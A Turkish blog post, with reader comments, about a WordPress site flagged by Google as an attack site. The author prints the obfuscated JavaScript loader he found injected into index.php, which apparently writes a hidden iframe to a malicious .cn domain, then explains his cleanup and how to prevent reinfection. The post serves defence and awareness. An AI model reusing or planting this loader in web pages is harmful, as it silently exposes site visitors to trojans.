Merhaba arkadaşlar bugün sizlere zararlı bir kodun bilgisayarınıza ve internet sitenize neler yapacağından bahsetmek istiyorum.
Dün bir kunnanıcım bana mail attı. İnternet sayfasına girildiği zaman “Saldırgan olarak bildirilmiş site!” uyarısı ile karşılaştığını söyledi. Hemen girdim karşıma gelen uyarı mesajı
Saldırgan olarak bildirilmiş site!
www.xxx.com konumundaki sitenin saldırı sitesi olduğu bildirildi ve açılması güvenlik tercihlerinize dayanılarak engellendi.
Saldırı sitesi olarak tanımlanan siteler özel bilgilerinizi çalan, bilgisayarınızı başkalarına saldırı amacıyla kullanan ya da sisteminize zarar veren programları kurmaya çalışan sitelerdir.
Bazı saldırı siteleri zararlı yazılımları bilerek dağıtırken, çoğu site, sahibinin bilgisi ve izni dışında bu amaçla kullanılır.
Bu hata mesajını Google Toolbar çıkartmakta. Bir an şaşırdım bir XXX firmasının internet sayfasına Google Toolbar neden saldırgan bir site olarak algılasın ki ? Kurulu sistem WordPress altyapısına sahip hemen XXX Bey’den internet sitesinin şifrelerini aldım.
Kodları incelediğimde index.php sayfasının en altında yabancı bir koda rastladım. Bu kod aslında şifrelenmiş bir java script kodu.
Zararlı Javascript kodu :
<!-- ad -->
<script type="text/javascript">
function jgouxhcixerkio(gqnfvwqckkaxvgg){var xlwqrzxo="";
for(mxkoehci=0;mxkoehci<gqnfvwqckkaxvgg.length;mxkoehci+=2)
{xlwqrzxo+=(String.fromCharCode(parseInt(gqnfvwqckkaxvgg.substr(mxkoehci,2),16)));}
document.write(xlwqrzxo);}jgouxhcixerkio(
"3C696672wqxeru61wqxeru6Dwqxeru65wqxeru20wqxeru737263wqxeru3D22wqxeru68wqxeru74747
0wqxeru3Awqxeru2F2Fwqxeru676Fwqxeru6Fwqxeru67wqxeru6C652Dwqxeru73wqxeru746174
732E636E2F7371wqxeru6Cwqxeru2Fwqxeru69wqxeru6Ewqxeru2Ewqxeru636769wqxeru3F
wqxeru646566wqxeru6175wqxeru6C7422wqxeru206672wqxeru61wqxeru6D65626Fwqxer
u72wqxeru6465wqxeru723Dwqxeru22wqxeru30wqxeru222062wqxeru6Fwqxeru7264wqxeru6
5wqxeru72wqxeru3Dwqxeru2230222077wqxeru69wqxeru6474683Dwqxeru22wqxeru302220
6865wqxeru69676874wqxeru3Dwqxeru22wqxeru30wqxeru22wqxeru2073wqxeru74wqxeru
79wqxeru6C65wqxeru3Dwqxeru22706Fwqxeru73wqxeru6974wqxeru696Fwqxeru6E3A2061wqxer
u62wqxeru736Fwqxeru6C7574653Bwqxeru20wqxeru76wqxeru6973wqxeru6962696Cwqxeru
69wqxeru74wqxeru79wqxeru3A20wqxeru68wqxeru69wqxeru6464656E3Bwqxeru20wqxeru64wqxer
u69wqxeru73wqxeru706Cwqxeru61wqxeru79wqxeru3A206Ewqxeru6F6E65wqxeru223E3C2Fwqxeru69
wqxeru66wqxeru7261wqxeru6D653Ewqxeru".replace(/wqxeru/g, ""));</script>
<!-- /ad -->
Kodu decode ettiğimde karşıma javascript ile yazılmış bir bağlantı scripti olduğunu fark ettim. Bu script sayesinde kurbanın internet sayfasında dirty-boy.cn, my-redsea.cn, goooglestat.cn internet adreslerine otomatik bağlantı vermekte ve tüm index.php index.html dosyalarına bulaşmakta olduğunu gördüm.
Uzun bir arayış sonrası </html> kodundan sonra tek satır halindeki bu kodu gördüğüm iyi oldu diyebilirim.
Bu verilmiş olan 3 bağlantı adresi Google tarafından kullanıcıya zarar veren 3. parti yazılımlar ve virüslerle sisteme bulaşan kullanıcı isteği dışında program yükleten siteler olarak belirlenmiş. Tabi ki bu tip siteler ve onlara bağlantı verenlere Google iyi gözle bakmaz. Böyle ana sayfadan direkt olarak kullanıcıya
Saldırgan olarak bildirilmiş site!
olarak uyarı verir. Google de olmasa halimiz yalan … 🙂 Neyse konuyu dağıtmadan devam edeyim.
Google arama motoru internet sayfalarını indexlerken aradan bizim çöplük diye hitap ettiklerimizi ayırmaya çalışır.
Google bu siteyi ziyaret ettiğinde ne oldu?
Geçtiğimiz 90 gün içinde bu sitede test ettiğimiz 537 sayfadan 26 sayfanın, kullanıcının rızası olmadan kötü amaçlı yazılım indirilmesine ve yüklenmesine neden olduğu saptanmıştır. Google, bu siteyi en son 2008-11-19 tarihinde ziyaret etmiş ve bu sitede en son 2008-11-19 tarihinde şüpheli içerik bulunmuştur.Kötü amaçlı yazılımlara örnek olarak şunları verebiliriz: 2 trojan(s). Başarıya ulaşan kötü amaçlı yazılımlar, hedef makinede ortalama 3 yeni işleme yol açtı.
Kötü amaçlı yazılım dirty-boy.cn, my-redsea.cn, goooglestat.cn alan adları da dahil 3 alanda barındırılıyor.
google-stats.cn, egypt-shop.cn, goooglestat.cn alan adları da dahil olmak üzere 3 alanın, bu sitenin ziyaretçilerine kötü amaçlı yazılım dağıtılmasına aracılık ettiği saptanmıştır.
XXX Türkiye internet sayfasının FTP şifrelerini aldım ve hemen işe koyuldum tüm klasörleri tek tek inceledim ve içlerindeki index.php ve index.html sayfalarının kaynak kodlarındaki bu zararlı yazılımı uçurdum. Sistemi son olarak test ettim ve temiz …
Bu duruma yol açabilecek nedenler :
1. Kullandığını tema dosyalarını lütfen temanın orjinal adresinden yada güvenilir internet sitelerinden indiriniz.
Çünkü oradan buradan indirdiğiniz dosyalara bu tip zararlı kodlar enjekte edilmiş veya bulaştırılmış olabilir. Korsan CD gibide düşünebilirsiniz.
2. Bilgisayarınıza indirdiğiniz linsanssız veya Free (bedava) yazılımlardan sisteminize bir virüs bulaşabilir ve internet sitenizin FTP sine bu virüsü kendi ellerinizle gönderebilirsiniz.
Lütfen internetten indirdiğinizi dosyaları iyi bir trojan ve antivirüs programları tarafından taratınız. Güvenilmeyen sitelerden dosya indirmeyiniz …
3. FTP şifreleriniz çok basit olabilir ve kötü niyetli kişiler tarafından internet sayfanıza bu tip zararlı kodlar eklenilebilir.
Lütfen altyapınızı (joomla, WordPress gibi) en son sürümüne güncelleyin ve FTP şifrelerinizi tahmin edilemeyecek karakterlerden oluşturunuz.
Peki bu uyarı nasıl gidecek ? Sürekli kullanıcı kaybediyorum..!
Google 90 gün içerisinde tekrar tekrar internet sayfanızı gelip inceler eğerki 90 gün içerisinde zararlı bir kod, virüs yada trojan bulamazsa yada bu tip sitelere link yoksa yani internet sayfanız 90 gün temiz kalırsa Google bu uyarıyı otomatik olarak kaldıracaktır. Sistem tekrar eski haline dönecektir.
Önceki akşam yazışmamızda konusu geçmişti. 🙂 Onun üzerine bu yazı iyi oldu. Pekiştim 😀
Emeğine sağlık…
dontEnter ;
Teşekkür ederim dostum elimden geldiği kadarıyla yazıyorum…
Bizim şirkette ki bazı sitelere de bulaştı bu virüs. Yazma izni olmadığı halde dosyalara nasıl bulaşıyor halen anlamış değilim.
merhaba arkadaşlar Saldırgan olarak bildirilmiş site uyarısını hemen hemen 3 haftadır alıyorum..Mozilla ve explorer’da google aramalarında sürekli değil ama ara sıra bu hatayı veriyor ve hatayı bulamadım hala..yardımcı olurmusunuz
kaan mutluol ;
Tabiki yardımcı olurum. Hangi internt sayfasında bu uyarıyı alıyorsun ? MSN’e gel istersen halledeyim.
Tea colik öncelikle ilgin için teşekkür ederim [email protected] buradan konuşalım..
<?php
// Silence is golden.
?>
buraya yazmam bilmem zararlı olurmu benim de tüm index sayfalarımın en sonunda bu kod var…
ilyas Teker ;
Bir sürü yolu var 🙂 Konuşuruz bir ara…
kaan ;
Ekledim sizi…
Mustafa ;
bu yazdığın koddan sonrası önemli Java Script kodu ile şifrelereyek bağlantı kodları oluşturuyor. Şuan yazdığın halinde bir zararı yok…
bu kodların belki zararı yok ama sitelerin açılmalarını engelliyor. bütün emeklerim ziyan oldu. ne kazanıyorlar bu şekilde davranmakla anlamak münkün değil…
Açıklama İçin teşekkürler bende aynı sorun ile karşılaştım önemli bilgiler olmadığı için ftp içeriğini sildim..Rica etsem yardım ederbilirmisiniz? sildikten sonra ne yapmalıyım?
Dosyalarını virüs taramasından geçirip tekrar upload et. Fakat virüs taramasından sonrada dosyaları text editöründe açıp zararlı bir kod olup olmadığına bakmanız gerekecek.
bende bu hatayı alıyorum msn adresim [email protected] bana ulasırsan sevinirim arkadasım
Anlatılan sorunla 2 gün önce kendi sitemde karşılaştım sorunu bir türlü çözemedim, daha doğrusu bu yöntemleri bilmiyordum, herşeyi sil baştan yapmak zorunda kaldım. Harcanan onca emek bir anda heba oluyor. En azından bu yazılanları okuyanlar olursa çok faydalı olabileceğini düşünüyorum. Ayrıntılı anlatım için teşekkürler.
Çok saolun ya birkaç gündür benim de karşılaştığım bir uyarıyıdı. Bu paylaşım için teşekkür ederim ..
Kafayı yemek üzereyim olmuyor hem kendi web sitem hem müşterilerim siteleri dağılmış durunda..
Bunun çözümü nedir ?
Arkadaslar ben bu konu hakkında sunu belırtmek ıstıyorum.Nette dolasan html kodlarinin cok buyuk bır bölümünde bulunuyor bu zarali kodlar.Genelde bedava sitelerde kullanmak icn bu ise yeni baslayan arkadaslar hep bu sitelerden hazir kod alip sitelerinie eklyorlar tabi tam anlamiyla anlamadiklari icinde kendi elleiryle kodlair sitelerine koyuyorlar bu konuda herkesin dikkatli olmaisni tavisye ederim bilmediginiz kodu asla eklemiyin sitenize.Ben ilk basladigimde basima geldi kendi sitem giremiyordum virus var diye.Ana cok gece sabahladim ve buldum sonunda.Fakat onlarin sayesinde cok seyler ögrendim.Tambir Webmaster oldum yani hic bir sey bilmezken.
google maalesef bu tür javascriptleri zararlı kod olarak görüyor siteyi zararlı siteler içine alıyor